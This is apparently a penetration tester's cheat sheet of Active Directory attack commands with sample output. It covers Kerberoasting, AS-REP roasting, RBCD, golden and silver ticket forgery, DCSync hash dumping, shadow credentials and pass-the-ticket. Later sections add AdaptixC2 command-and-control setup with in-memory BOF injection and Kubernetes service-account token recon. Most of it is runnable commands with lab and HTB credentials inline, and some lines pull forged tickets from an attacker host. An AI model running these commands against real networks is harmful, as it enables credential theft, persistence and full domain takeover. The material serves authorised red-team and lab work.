Set-DomainObject -Identity VulnCert -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)" -Set @{'mspki-certificate-application-policy' = '1.3.6.1.5.5.7.3.2', '1.3.6.1.5.5.7.3.4', '1.3.6.1.4.1.311.10.3.4'}

Prerequisites

  1. Template Security Permissions: Owner / WriteOwnerPrincipals / WriteDaclPrincipals / WritePropertyPrincipals.
  2. Template has to be enabled

Delegation

RBCD

Execution

  1. Edit msDS-AllowedToActOnBehalfOfOtherIdentity
###########################
### impacket ldap_shell ###
###########################
# set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
set_rbcd WIN-NUU0DPB1BVC$ TestAlpha


#####################
### impacket-rbcd ###
#####################
  1. Add SPN to current user
# -u == account we're using
# -t == target account
# 192.168.68.64 == DC IP
python3 utils/krbrelayx/addspn.py -u 'CONTOSO\TestAcc' -p 'win2016-cli-P@$swd' -s 'host/testspn.contoso.org' -t 'TestAlpha' 192.168.68.64
  2. Get a TGS for any user to a target service
impacket-getST -spn 'HOST/WIN-NUU0DPB1BVC' -impersonate 'Administrator' -dc-ip 192.168.68.64 'contoso.org/TestAlpha:win10-gui-P@$swd'

Prerequisites

  • victim - the account whose privileges we’d relay (e.g. a DA)
  • desired service - the service account to which we’d relay the victim’s auth
  • infected account - either fake (newly created specifically for the attack) or already owned by the attacker
  1. The desired service account should have an msDS-AllowedToActOnBehalfOfOtherIdentity attribute featuring the infected account’s SID. (You should be able to create a fake machine account (if you do NOT already own one!) and modify the target service’s attributes (if it DOESN’T feature your owned account already!)) (not default)
  2. The victim should not be in the “Protected Users” group. (default)
  3. The victim should not have the “Account is sensitive and cannot be delegated” flag set. (default)
  4. The infected account should have the TRUSTED_TO_AUTH_FOR_DELEGATION flag set in its userAccountControl attribute
  5. The infected account (the one set inside msDS-AllowedToActOnBehalfOfOtherIdentity of the target service) should have an SPN. (Machine accounts BY DEFAULT have GenericWrite to themselves, so if you compromise a machine account you can write an SPN to it; user accounts BY DEFAULT DO NOT, so a compromised user account must already have an SPN.) (default)
  6. If relaying to LDAP, LDAP signing should be OFF. (default)
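The userAccountControl attribute mentioned above is a plain bit field. A minimal stdlib-only Python sketch for decoding it (flag values taken from Microsoft's documentation; the flag subset shown is my selection, not exhaustive):

```python
# subset of userAccountControl bit flags relevant to delegation attacks
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x100000: "NOT_DELEGATED",  # "Account is sensitive and cannot be delegated"
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

# e.g. a machine account that is trusted to authenticate for delegation
print(decode_uac(0x1000 | 0x1000000))
# -> ['WORKSTATION_TRUST_ACCOUNT', 'TRUSTED_TO_AUTH_FOR_DELEGATION']
```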

Cred Usage

Misc

convert ccache to kirbi

# convert ticket to kirbi for Rubeus or mimikatz
impacket-ticketConverter Administrator.ccache Administrator.kirbi

# then download the ticket on windows
wget -outfile Administrator.kirbi -uri http://192.168.68.10:9595/Administrator.kirbi -usebasicparsing

# ensure all low-priv tickets are removed 
klist purge

# then import the ticket on windows
# use either this
mimikatz "kerberos::ptt Administrator.kirbi" exit
# or this
Rubeus.exe ptt /ticket:Administrator.kirbi

# ensure it's imported
klist

Pass-the-Cache

WMI

export KRB5CCNAME=Administrator.ccache && klist && impacket-wmiexec -debug -k -no-pass contoso.org/Administrator@WIN-KML6TP4LOOL
# Valid starting     Expires            Service principal
# 02/20/25 02:30:16  02/18/35 02:30:16  CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# renew until 02/18/35 02:30:16
# Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
#
# [+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
# [+] Using Kerberos Cache: Administrator.ccache
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [*] SMBv3.0 dialect used
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [+] Target system is WIN-KML6TP4LOOL and isFQDN is True
# [+] StringBinding: \\\\WIN-KML6TP4LOOL[\\PIPE\\atsvc]
# [+] StringBinding: WIN-KML6TP4LOOL[49665]
# [+] StringBinding chosen: ncacn_ip_tcp:WIN-KML6TP4LOOL[49665]
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [+] Using Kerberos Cache: Administrator.ccache
# [+] SPN HOST/WIN-KML6TP4LOOL@CONTOSO.ORG not found in cache
# [+] AnySPN is True, looking for another suitable SPN
# [+] Returning cached credential for CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG
# [+] Using TGS from cache
# [+] Changing sname from CIFS/WIN-KML6TP4LOOL@CONTOSO.ORG to HOST/WIN-KML6TP4LOOL@CONTOSO.ORG and hoping for the best
# [!] Launching semi-interactive shell - Careful what you execute
# [!] Press help for extra shell commands
C:\>whoami
# contoso.org\administrator
C:\>
### PKINIT is enabled
# use a pfx file with certipy-ad
certipy-ad auth -pfx ./WIN-KML6TP4LOOL\$.pfx -dc-ip 192.168.68.64 -domain contoso.org


### PKINIT is disabled
# if you get the following error that means DC's KDC certificate doesn't support PKINIT (because DC's certificate doesn't have "KDC Authentication" EKU)
# KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)
# in order to resolve it do the following:
# the pfx format contains a private key and the cert. extract them.
certipy cert -pfx administrator_forged.pfx -nokey -out administrator.crt
certipy cert -pfx administrator.pfx -nocert -out administrator.key
# download and use "passthecert" utility
wget https://raw.githubusercontent.com/AlmondOffSec/PassTheCert/refs/heads/main/Python/passthecert.py
# even when PKINIT is not supported, we can still authenticate to a DC over LDAP using mTLS - this is what passthecert.py does. Unfortunately, if the account you coerced and got the cert for doesn't have the necessary LDAP rights (e.g. it's a domain controller computer account, which can do nothing useful apart from RPC DCSync), you cannot do anything with it

# If you get something similar to "User not found in LDAP" that probably means the DC you have the cert for is not domain-joined
# now you can grant yourself DCSync privs, reset a user's password, or change the DC's msDS-AllowedToActOnBehalfOfOtherIdentity for RBCD
# This (modify_user + -elevate) will grant the user account DCSync privileges
python3 ./passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl

WinRM

# MAKE SURE /etc/krb5.conf HAS THE contoso.org DOMAIN SPECIFIED
# MAKE SURE -i INCLUDES FQDN AND THAT IT IS RESOLVABLE
# make sure the SPN is HTTP/...
export KRB5CCNAME=Administrator.ccache && evil-winrm -i WIN-KML6TP4LOOL.contoso.org -r contoso.org

# IF SPN is WSMAN or HOST or ANY other - specify it in --spn parameter
evil-winrm -i WIN-KML6TP4LOOL.contoso.org -r contoso.org --spn WSMAN

Roasting

ASREPRoasting

Execution

## authenticated
impacket-GetNPUsers -format hashcat -outputfile ASREProastables.txt -dc-ip $KDC_IP -request "$DOMAIN/$USER:$PASSWD"
# impacket-GetNPUsers -format hashcat -outputfile ASREProastables.txt -dc-ip 192.168.68.64 -request 'CONTOSO.ORG/TestAlpha:win10-gui-P@$swd'
# use 'CONTOSO.ORG/' for unauthenticated bind

## with hashes
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -hashes "$LM_HASH:$NT_HASH" -dc-ip $KDC_IP "$DOMAIN/$USER"

Prerequisites

  1. At least one user in the domain has the DONT_REQ_PREAUTH flag set (not default)
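DONT_REQ_PREAUTH is bit 0x400000 of userAccountControl, so such accounts can also be found with a raw LDAP query. A small sketch that builds the filter (1.2.840.113556.1.4.803 is AD's bitwise-AND matching rule OID):

```python
# DONT_REQ_PREAUTH bit of userAccountControl
DONT_REQ_PREAUTH = 0x400000

# matching-rule filter: userAccountControl AND 0x400000 != 0
ldap_filter = (
    "(&(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH}))"
)
print(ldap_filter)
# -> (&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
```

The printed filter can be passed as the last argument to ldapsearch.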

TGSREPRoasting

Execution

  • request TGSs for user accounts that have an SPN
# perform kerberoasting without preauth (AS-REQ) (when a user has DONT_REQ_PREAUTH)
impacket-GetUserSPNs -no-preauth "$USER" -usersfile $USERS_FILE -dc-host $KDC_IP $DOMAIN/ -request
# impacket-GetUserSPNs -no-preauth "AltAdmLocal" -usersfile users.txt -dc-host 192.168.68.64 contoso.org/ -request

# perform kerberoasting knowing user's password
impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip $KDC "$DOMAIN/$USER:$PASSWD"
# impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip 192.168.68.64 'contoso.org/TestAlpha:win10-gui-P@$swd'


# request a TGS for a single specific kerberoastable user (Ethan, in this case)
impacket-GetUserSPNs -request-user 'ethan' -dc-ip 10.10.11.42 'administrator.htb'/'emily':'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Prerequisites

  1. The ability to request a TGS for a particular service, either via a TGS-REQ (i.e. (1) the user’s logon-session key in the LSA cache (obtained with the user’s Kerberos key (derived from the user’s NT hash) from the previously requested AS-REP) and (2) a TGT for that user) OR via an AS-REQ (an account with DoNotRequirePreauth set, see the HTB Rebound box).
  2. The password of the service account you request a TGS for should have been set by a human (otherwise it would be nearly impossible to crack). In fact, the impacket-GetUserSPNs utility only requests TGSs for user accounts that have an SPN.

KRB5 Forgery

Golden Ticket

Execution

impacket-secretsdump -outputfile secretsdump.txt 'contoso.org'/'Administrator':'win2016-cli-P@$swd1!'@'192.168.68.64'

cat secretsdump.txt.ntds
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:c70399550b62d5f52c84b2a2fad7b41a:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60fcae2d99c85fb300602b91223f9516:::
# ...
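Each line of the `.ntds` dump above follows the `sAMAccountName:RID:LM-hash:NT-hash:::` format, so the krbtgt NT hash for the ticketer command can be pulled out mechanically. A quick stdlib sketch:

```python
# each .ntds line is sAMAccountName:RID:LM-hash:NT-hash:::
line = "krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60fcae2d99c85fb300602b91223f9516:::"

user, rid, lm_hash, nt_hash = line.split(":")[:4]
print(user, rid, nt_hash)
# -> krbtgt 502 60fcae2d99c85fb300602b91223f9516
```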

impacket-lookupsid contoso.org/Administrator@192.168.68.64
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# Password:
# [*] Brute forcing SIDs at 192.168.68.64
# [*] StringBinding ncacn_np:192.168.68.64[\pipe\lsarpc]
# [*] Domain SID is: S-1-5-21-245103785-2483314120-3684157271
# ...

sudo impacket-ticketer -nthash '60fcae2d99c85fb300602b91223f9516' -domain-sid 'S-1-5-21-245103785-2483314120-3684157271' -domain 'contoso.org' 'Administrator'
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for contoso.org/Administrator
# [*]   PAC_LOGON_INFO
# [*]   PAC_CLIENT_INFO_TYPE
# [*]   EncTicketPart
# [*]   EncAsRepPart
# [*] Signing/Encrypting final ticket
# [*]   PAC_SERVER_CHECKSUM
# [*]   PAC_PRIVSVR_CHECKSUM
# [*]   EncTicketPart
# [*]   EncASRepPart
# [*] Saving ticket in Administrator.ccache

Silver Ticket

Execution

# get domain SID
impacket-lookupsid contoso.org/Administrator@192.168.68.179
# Impacket v0.12.0.dev1 - Copyright 2023 Fortra
#
# Password:
# [*] Brute forcing SIDs at 192.168.68.179
# [*] StringBinding ncacn_np:192.168.68.179[\pipe\lsarpc]
# [*] Domain SID is: S-1-5-21-245103785-2483314120-3684157271
# ...




ldapsearch -LLL -x -H ldap://192.168.68.179 -D 'Administrator@contoso.org' -w 'win2016-cli-P@$swd1!' -b 'dc=contoso,dc=org'
# dn: CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=contoso,DC=org
# objectClass: top
# objectClass: person
# objectClass: organizationalPerson
# objectClass: user
# objectClass: computer
# cn: WIN-NUU0DPB1BVC
# distinguishedName: CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=contoso,DC=org
# ...
# serverReferenceBL: CN=WIN-NUU0DPB1BVC,CN=Servers,CN=Default-First-Site-Name,CN
#  =Sites,CN=Configuration,DC=contoso,DC=org
# dNSHostName: WIN-NUU0DPB1BVC.contoso.org
# rIDSetReferences: CN=RID Set,CN=WIN-NUU0DPB1BVC,OU=Domain Controllers,DC=conto
#  so,DC=org
# servicePrincipalName: RPC/bd05490f-2c96-4f89-9201-c530cfa7eda4._msdcs.contoso.
#  org
# servicePrincipalName: GC/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC/CONTOSO
# servicePrincipalName: ldap/bd05490f-2c96-4f89-9201-c530cfa7eda4._msdcs.contoso
#  .org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/CONTOSO
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/ForestDnsZones.contoso.
#  org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/DomainDnsZones.contoso.
#  org
# servicePrincipalName: ldap/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/bd05490f-2c96-4f89-
#  9201-c530cfa7eda4/contoso.org
# servicePrincipalName: DNS/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org/CONTOSO
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org/contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC/CONTOSO
# servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-NUU0DPB1BV
#  C.contoso.org
# servicePrincipalName: TERMSRV/WIN-NUU0DPB1BVC
# servicePrincipalName: TERMSRV/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: WSMAN/WIN-NUU0DPB1BVC
# servicePrincipalName: WSMAN/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: RestrictedKrbHost/WIN-NUU0DPB1BVC
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC
# servicePrincipalName: RestrictedKrbHost/WIN-NUU0DPB1BVC.contoso.org
# servicePrincipalName: HOST/WIN-NUU0DPB1BVC.contoso.org
# ...
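Each servicePrincipalName above has the form `serviceclass/host[:port][/servicename]`; for a silver ticket you forge a TGS for one serviceclass/host pair the target machine serves. A trivial sketch of splitting an SPN into its parts:

```python
# an SPN has the form serviceclass/host[:port][/servicename]
spn = "HOST/WIN-NUU0DPB1BVC.contoso.org"

service_class, _, host = spn.partition("/")
print(service_class, host)
# -> HOST WIN-NUU0DPB1BVC.contoso.org
```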



# you can use any online NTLM hash generator to obtain -nthash if you only have password

# generate TGS that is signed with service account's kerberos key (derived from -nthash) 
# for the target user "Administrator" and target SPN MSSQLSvc and apply 512 group to that user
### DONT FORGET TO FIX THE CLOCK SKEW
sudo ntpdate 192.168.68.64 && sudo impacket-ticketer -nthash fd72ca83b31d63f864440afa274bbd0c -domain-sid S-1-5-21-245103785-2483314120-3684157271 -domain contoso.org -spn HOST/WIN-KML6TP4LOOL Administrator
# 2025-02-20 02:31:38.877088 (+1100) +0.101192 +/- 0.000193 192.168.68.64 s1 no-leap
# Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

# [*] Creating basic skeleton ticket and PAC Infos
# [*] Customizing ticket for contoso.org/Administrator
# [*]     PAC_LOGON_INFO
# [*]     PAC_CLIENT_INFO_TYPE
# [*]     EncTicketPart
# /usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
# encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
# [*]     EncTGSRepPart
# [*] Signing/Encrypting final ticket
# [*]     PAC_SERVER_CHECKSUM
# [*]     PAC_PRIVSVR_CHECKSUM
# [*]     EncTicketPart
# [*]     EncTGSRepPart
# [*] Saving ticket in Administrator.ccache
# Ticket cache: FILE:Administrator.ccache
# Default principal: Administrator@CONTOSO.ORG

LDAP

BH

Resources

bloodhound-python

### EXAMPLES
bloodhound-python -c All -d 'BLACKFIELD.local' -u 'support@blackfield.local' -p '#00^BlackKnight' -ns '10.10.10.192'

quickstart

############
###  BH  ###
############
# tested on kali
sudo neo4j start              # will start as a daemon
http://127.0.0.1:7474/ # -> neo4j:neo4j -> change password

### EITHER
./BloodHound # -> neo4j:$CHANGED_PASSWORD
# configure dark theme in Settings=>DarkMode
# Ctrl+R to fix the blank screen!!

### OR
sudo vim /etc/bhapi/bhapi.conf
# enter the password

# navigate to 127.0.0.1:8080
# enter admin:admin
#
# firefox -> about:config -> webgl.force-enabled -> true

############
### BHCE ###
############
# run BHCE in container 
curl -L https://ghst.ly/getbhce | sudo docker compose -f - up
http://127.0.0.1:8080 => admin@password_from_command_output # wait for status change

rusthound

rusthound -d certified.htb -u 'judith.mader' -p 'judith09'

sharphound

### EXAMPLES
SharpHound.exe -d contoso.local --domaincontroller $DC_IP -c All

OpenLDAP

ldapadd

### add entries to LDAP db from .ldif file 
# -D: account to authenticate to
ldapadd -D "cn=Manager,dc=example,dc=org" -W -f base.ldif

ldapdelete

ldapdelete $DN

ldapmodify

### USAGE: same as ldapadd

### EXAMPLE (- ARE ACTUALLY IMPORTANT)
dn: cn=Modify Me,dc=example,dc=com
changetype: modify
replace: mail
mail: modme@example.com
-
add: title
title: Grand Poobah
-
add: jpegPhoto
jpegPhoto:< file:///tmp/modme.jpeg
-
delete: description
-

ldapsearch

### PARAMETERS
-H ldapuri     # ldap-server uri (required for non-localhost searches)
-W             # Prompt for simple authentication
-x             # use simple authentication instead of SASL
-D binddn      # bind to ldap directory via the DN
-f             # ldif file to add
-b searchbase  # object to search for (i.e. database to search under) (e.g. cn=config)
-s {base|one|sub|children} # search scope (most probably you want "sub" for a subtree (recursive) search)
-LLL           # print in LDIF format
-Y {EXTERNAL,DIGEST-MD5,GSSAPI} # Set the SASL auth mechanism
-ZZ            # use StartTLS (works for ldap://)

### FILTER
cn dc someRandomAttribute  # names of attributes to return
+                          # returns ALL attributes
'(someAttribute=*)'        # filters by attribute value

### EXAMPLES
# anonymous bind (often only `-s base` will be allowed anonymously)
ldapsearch -H ldap://10.10.11.241 -x -s base
# get everything
ldapsearch -LLL -x -H ldap://192.168.68.64 -D "Administrator@contoso.org" -w 'win2016-cli-P@$swd' -b 'dc=contoso,dc=org'
# filter by "name" LDAP attribute
ldapsearch -LLL -x -H ldap://192.168.68.64 -D "Administrator@contoso.org" -w 'win2016-cli-P@$swd' -b 'dc=contoso,dc=org' 'name=DESKTOP-PD18STT'
# show only specific attributes
ldapsearch -LLL -x -H ldap://192.168.68.64 -D "Administrator@contoso.org" -w 'win2016-cli-P@$swd' -b 'dc=contoso,dc=org' name memberOf

pywerview

# search 'administrator' user
pywerview get-netuser -w contoso.org --dc-ip 192.168.68.64 -u TestAcc -p 'win2016-cli-P@$swd' --username administrator

# get users
pywerview get-netuser -w sequel.htb --dc-ip 10.10.11.51 -u rose -p 'KxEPkKe6R8su'

# get 'management' group
pywerview get-netgroup -w certified.htb --dc-ip 10.10.11.41 -u judith.mader -p judith09 --full-data --groupname 'Management'

# check acls against management group
pywerview get-objectacl -u judith.mader -p 'judith09' -t 10.10.11.41 --resolve-sids --sam-account-name Management

# get group members
pywerview get-netgroupmember -w certified.htb --dc-ip 10.10.11.41 -u judith.mader -p judith09 --groupname 'Management'

# get DC
pywerview get-netdomaincontroller -w certified.htb --dc-ip 10.10.11.41 -u judith.mader -p judith09

Replication

DCSync

Execution

############
### UNIX ###
############
# using a plaintext password
impacket-secretsdump -outputfile $FILES_NAME "$DOMAIN"/"$USER":"$PASSWORD"@"$DOMAINCONTROLLER"
# impacket-secretsdump -outputfile contoso.dump 'CONTOSO.ORG'/'Administrator':'win2016-cli-P@$swd'@'192.168.68.64'

# with PTH (COMPUTERNAME$)
impacket-secretsdump -outputfile $FILES_NAME -hashes $LMHASH:$NTHASH $DOMAIN/"$USER"@"$DOMAINCONTROLLER"
# impacket-secretsdump -outputfile contoso.dump -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 'CONTOSO.ORG/WIN-NUU0DPB1BVC$@192.168.68.64'

# PTT
impacket-secretsdump -k -outputfile $FILES_NAME "$DOMAIN"/"$USER"@"$KDC_DNS_NAME"
# impacket-secretsdump -k -outputfile contoso.org.dump WIN-KML6TP4LOOL.contoso.org

# NTLM relay is POSSIBLE IF VULNERABLE TO ZEROLOGON

Prerequisites

  1. DS-Replication-Get-Changes (part of GenericAll on Domain object (Enterprise Admins))
  2. DS-Replication-Get-Changes-All (part of GenericAll on Domain object (Enterprise Admins))

Persistence

Shadow Credentials

Execution

# generate a pfx and add the public cert to msDS-KeyCredentialLink of the --target (make sure to save the output password)
python pywhisker.py -d "$FQDN_DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET_SAMNAME" --action "add"
python pywhisker.py -d 'contoso.org' -u 'TestAcc' -p 'win2016-cli-P@$swd' --target 'AltAdmLocal' --action 'add'
# [+] Saved PFX (#PKCS12) certificate & key at path: 4CHGOm7F.pfx
# [*] Must be used with password: QVcxLbcT0YdVbGDXqQG5

# confirm that msDS-KeyCredentialLink is added
python pywhisker.py -d "$FQDN_DOMAIN" -u "$USER" -p "$PASSWORD" --target "$TARGET_SAMNAME" --action "list"


# use this pfx cert/key pair to request a TGT
# grep the password from `pywhisker add` command and put into -pfx-pass
gettgtpkinit $DOMAIN/$USER -cert-pfx $PFX_FILE -pfx-pass $PASSWORD_FOR_PFX -dc-ip $KDC $OUTPUT.ccache
python3 ./PKINITtools/gettgtpkinit.py contoso.org/AltAdmLocal -cert-pfx ../pywhisker/4CHGOm7F.pfx -pfx-pass QVcxLbcT0YdVbGDXqQG5 -dc-ip 192.168.68.179 AltAdmLocal.ccache

Notes

  • 01.2026 Shadow Creds no longer work after the January patch. However, the issue is related to Microsoft removing the computer object’s permission to write to its own ms-DS-Key-Credential-Link attribute. If you grant the computer object that permission back, the relaying works as before.

Persistence

C2

AdaptixC2

setup

cd ~
mkdir utils
cd utils
git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
chmod +x pre_install_linux_all.sh
sudo ./pre_install_linux_all.sh server
make server-ext
cd dist
openssl req -x509 -nodes -newkey rsa:2048 -keyout server.rsa.key -out server.rsa.crt -days 3650

sudo bash -c 'cat <<EOF > /etc/systemd/system/adaptixserver.service
[Unit]
Description=AdaptixC2

[Service]
ExecStart=/home/user/utils/AdaptixC2/dist/adaptixserver -profile /home/user/utils/AdaptixC2/dist/profile.yaml
Restart=always
User=root
WorkingDirectory=/home/user/utils/AdaptixC2/dist

[Install]
WantedBy=multi-user.target
EOF'

sudo systemctl daemon-reload
sudo systemctl enable adaptixserver.service
sudo systemctl start adaptixserver.service
sudo systemctl status adaptixserver.service

BOF

cd ~/utils/
sudo apt install g++-mingw-w64-x86-64-posix  gcc-mingw-w64-x86-64-posix  mingw-w64-tools
git clone https://github.com/Adaptix-Framework/Extension-Kit
cd Extension-Kit
make

Load all modules in AdaptixC2 client: Main menu -> Script manager -> Load new and select the extension-kit.axs file.

After doing that, you will be able to use the BOF more conveniently, directly through an agent console (e.g. ldap get-users -ou "OU=Users,DC=domain,DC=local" -dc dc01.domain.local -a description,mail). However, this approach requires an axscript (e.g. AD-BOF/ad.axs) to be written for each BOF. If you just want to execute an arbitrary BOF, use the execute bof command (e.g. execute bof /home/user/utils/bofs/bin/ldapsearch.o); of course Adaptix won’t be able to parse such a BOF’s output, but you can observe its traffic in the adaptixserver output logs.

After executing any of the above mentioned commands, the BOF will be automatically uploaded to the agent, injected and executed in-memory.

Linux

RDP

XRDP setup

sudo apt update && sudo apt upgrade -y
sudo apt install xrdp -y
sudo systemctl enable xrdp
sudo adduser xrdp ssl-cert
sudo systemctl restart xrdp
# now logout from desktop and use remmina to remotely connect

UAC bypasses

SSPI datagram contexts

Android

termux

Setup

# enable storage access
termux-setup-storage    # this will create a symlink set to /storage/emulated/** in termux home dir
ls ~/storage/shared

### white cursor
# Android => Settings => Dark Mode settings => disable dark mode for Termux
echo "cursor=#FFFFFF" >> ~/.termux/colors.properties
termux-reload-settings

### git
# write ~ path in .ssh/config
# ensure .ssh/config is 600
echo '192.168.1.69 dc-1.aisp.aperture.local' >> ~/.hosts
echo 'export HOSTALIASES=~/.hosts' >> ~/.bashrc   # append (>>), don't overwrite .bashrc
wget g -O /dev/null

Termux url opener example (executes on url share). This file should be stored under $HOME/bin/termux-url-opener

integrate nvim yank & paste with system clipboard

  • install Termux-API and follow the setup instructions
  • pkg install termux-api

Recon

Basic

DNS enum

  • find out nameserver
cat /etc/resolv.conf
# search k8s-lan-party.svc.cluster.local svc.cluster.local cluster.local us-west-1.compute.internal
# nameserver 10.100.120.34
# options ndots:5
  • if you already know the hostname you want to resolve and have the necessary utility to make a request:
dig @10.100.120.34 getflag-service.k8s-lan-party.svc.cluster.local | grep -A1 "ANSWER SECTION"
# ;; ANSWER SECTION:
# getflag-service.k8s-lan-party.svc.cluster.local. 30 IN A 10.100.136.254
  • if you know the IP address you want to get a DNS name of perform a reverse DNS lookup (PTR record):
dig @10.100.120.34 -x 10.100.136.254 | grep -A1 "ANSWER SECTION"
# ;; ANSWER SECTION:
# 254.136.100.10.in-addr.arpa. 15 IN      PTR     getflag-service.k8s-lan-party.svc.cluster.local
  • Or perform reverse lookups for a CIDR via dnscan:
dnscan -subnet 10.100.0.1/16
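The reverse lookup above is just a regular query for a PTR record under in-addr.arpa; Python's stdlib can construct the exact query name that `dig -x` sends:

```python
import ipaddress

# build the PTR query name that `dig -x 10.100.136.254` sends under the hood
addr = ipaddress.ip_address("10.100.136.254")
print(addr.reverse_pointer)
# -> 254.136.100.10.in-addr.arpa
```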

General

# A) get username and (cluster)roles/(cluster)rolebindings you're in
kubectl auth whoami

# A) List all allowed actions in namespace "foo"
kubectl auth can-i --list --namespace 'foo'

# A) get current config that kubectl uses
kubectl config view
# if it's not successful, try grepping env/set output for KUBECONFIG

# A) get all resource types available
kubectl api-resources

# A) get resources of kind
kubectl get configmaps --all-namespaces

# A) get contents of a specific object after you got the name using GET verb
kubectl describe configmap --namespace kube-system coredns

# A) get full secret
kubectl get secret sh.helm.release.v1.fluentd.v1 -o yaml

Initial from within a container

  • /etc/resolv.conf -> the search property can give away the cluster’s DNS root.
# If you have access to /etc/resolv.conf - check if there is 'search ...' - there will be core DNS for K8s
# e.g. if `search ... XXX.YYY`, then
# API might be located at kubernetes.default.svc.XXX.YYY:443
cat /etc/resolv.conf
# search default.svc.cluster.local svc.cluster.local cluster.local kubernetes.org
# nameserver 10.96.0.10
# options ndots:5

# query the apiserver certificate
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

curl -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" --insecure https://kubernetes.default.svc.cluster.local
# {
#   "kind": "Status",
#   "apiVersion": "v1",
#   "metadata": {},
#   "status": "Failure",
#   "message": "forbidden: User \"system:serviceaccount:default:default\" cannot get path \"/\"",
#   "reason": "Forbidden",
#   "details": {},
#   "code": 403
# }
  • set -> the KUBERNETES_XXX environment variables give away the kube-apiserver service address and let you make requests to the kube-apiserver from within a pod
root@nginx-test-574bc578fc-dbsh7:/# set | grep KUBERNETES
# KUBERNETES_PORT=tcp://10.96.0.1:443
# KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
# KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
# KUBERNETES_PORT_443_TCP_PORT=443
# KUBERNETES_PORT_443_TCP_PROTO=tcp
# KUBERNETES_SERVICE_HOST=10.96.0.1
